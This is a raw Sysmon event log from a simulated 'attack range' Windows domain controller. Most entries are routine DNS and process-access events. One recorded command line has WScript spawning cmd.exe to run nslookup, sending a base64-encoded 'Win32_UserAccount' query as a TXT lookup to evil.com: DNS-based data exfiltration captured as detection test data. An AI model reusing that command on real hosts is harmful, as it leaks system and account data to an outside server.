354300x8000000000000000202355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.417{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52887- 354300x8000000000000000202354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.417{00000000-0000-0000-0000-000000000000}7236<unknown process>-udptruefalse127.0.0.1-52887-false127.0.0.1-53domain 354300x8000000000000000202353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.416{00000000-0000-0000-0000-000000000000}7236<unknown process>-udpfalsefalse127.0.0.1-52886-false127.0.0.1-53domain 354300x8000000000000000202352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.416{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52886- 354300x8000000000000000202351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.416{00000000-0000-0000-0000-000000000000}7236<unknown process>-udptruefalse127.0.0.1-52886-false127.0.0.1-53domain 354300x8000000000000000202350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.414{00000000-0000-0000-0000-000000000000}7236<unknown process>-udpfalsefalse127.0.0.1-52885-false127.0.0.1-53domain 354300x8000000000000000202349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.414{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52885- 354300x8000000000000000202348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.414{00000000-0000-0000-0000-000000000000}7236<unknown process>-udptruefalse127.0.0.1-52885-false127.0.0.1-53domain 354300x8000000000000000202347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.321{00000000-0000-0000-0000-000000000000}1700<unknown process>-udpfalsefalse127.0.0.1-52884-false127.0.0.1-53domain 354300x8000000000000000202346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.321{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52884- 23542300x8000000000000000202345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.536{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyevld.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000202344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.321{00000000-0000-0000-0000-000000000000}1700<unknown process>-udptruefalse127.0.0.1-52884-false127.0.0.1-53domain 354300x8000000000000000202343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.320{00000000-0000-0000-0000-000000000000}1700<unknown process>-udpfalsefalse127.0.0.1-52883-false127.0.0.1-53domain 354300x8000000000000000202342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.320{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52883- 354300x8000000000000000202341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.319{00000000-0000-0000-0000-000000000000}1700<unknown process>-udpfalsefalse127.0.0.1-52882-false127.0.0.1-53domain 354300x8000000000000000202340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52882- 354300x8000000000000000202339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.319{00000000-0000-0000-0000-000000000000}1700<unknown process>-udptruefalse127.0.0.1-52882-false127.0.0.1-53domain 354300x8000000000000000202338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.192{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52881- 354300x8000000000000000202337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.191{00000000-0000-0000-0000-000000000000}4484<unknown process>-udpfalsefalse127.0.0.1-52880-false127.0.0.1-53domain 354300x8000000000000000202336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.191{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52880- 354300x8000000000000000202335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.190{00000000-0000-0000-0000-000000000000}4484<unknown process>-udpfalsefalse127.0.0.1-52879-false127.0.0.1-53domain 354300x8000000000000000202334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.190{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52879- 354300x8000000000000000202333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52878- 354300x8000000000000000202332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.078{00000000-0000-0000-0000-000000000000}5232<unknown process>-udpfalsefalse127.0.0.1-52877-false127.0.0.1-53domain 354300x8000000000000000202331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.078{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52877- 354300x8000000000000000202330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.078{00000000-0000-0000-0000-000000000000}5232<unknown process>-udptruefalse127.0.0.1-52877-false127.0.0.1-53domain 354300x8000000000000000202329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.077{00000000-0000-0000-0000-000000000000}5232<unknown process>-udpfalsefalse127.0.0.1-52876-false127.0.0.1-53domain 354300x8000000000000000202328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.076{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52876- 354300x8000000000000000202327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.076{00000000-0000-0000-0000-000000000000}5232<unknown process>-udptruefalse127.0.0.1-52876-false127.0.0.1-53domain 354300x8000000000000000202326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{00000000-0000-0000-0000-000000000000}7416<unknown process>-udpfalsefalse127.0.0.1-52875-false127.0.0.1-53domain 354300x8000000000000000202325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52875- 354300x8000000000000000202324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{00000000-0000-0000-0000-000000000000}7416<unknown process>-udpfalsefalse127.0.0.1-52874-false127.0.0.1-53domain 354300x8000000000000000202323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52874- 354300x8000000000000000202322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.955{00000000-0000-0000-0000-000000000000}7416<unknown process>-udptruefalse127.0.0.1-52874-false127.0.0.1-53domain 354300x8000000000000000202321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.954{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52873- 354300x8000000000000000202320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.954{00000000-0000-0000-0000-000000000000}7416<unknown process>-udptruefalse127.0.0.1-52873-false127.0.0.1-53domain 354300x8000000000000000202319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-52872-false127.0.0.1-53domain 354300x8000000000000000202318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52872- 354300x8000000000000000202317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-52872-false127.0.0.1-53domain 354300x8000000000000000202316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-52871-false127.0.0.1-53domain 354300x8000000000000000202315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.830{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52871- 354300x8000000000000000202314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-52871-false127.0.0.1-53domain 354300x8000000000000000202313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{00000000-0000-0000-0000-000000000000}4188<unknown process>-udpfalsefalse127.0.0.1-52870-false127.0.0.1-53domain 354300x8000000000000000202312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52870- 354300x8000000000000000202311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.829{00000000-0000-0000-0000-000000000000}4188<unknown process>-udptruefalse127.0.0.1-52870-false127.0.0.1-53domain 10341000x8000000000000000202310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-17C6-629A-3E41-000000005F02}36165112C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3F41-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3F41-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.516{2E1864BB-17C6-629A-3D41-000000005F02}51044348C:\Windows\system32\cmd.exe{2E1864BB-17C6-629A-3F41-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.518{2E1864BB-17C6-629A-3F41-000000005F02}3292C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C6-629A-3D41-000000005F02}5104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyevld.tmp 2>&1 10341000x8000000000000000202302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.499{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3E41-000000005F02}3616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.499{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C6-629A-3E41-000000005F02}3616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.483{2E1864BB-17C6-629A-3E41-000000005F02}36165112C:\Windows\system32\conhost.exe{2E1864BB-17C6-629A-3D41-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.483{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3E41-000000005F02}3616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C6-629A-3D41-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:38.469{2E1864BB-17A1-629A-783D-000000005F02}55522172C:\Windows\System32\WScript.exe{2E1864BB-17C6-629A-3D41-000000005F02}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL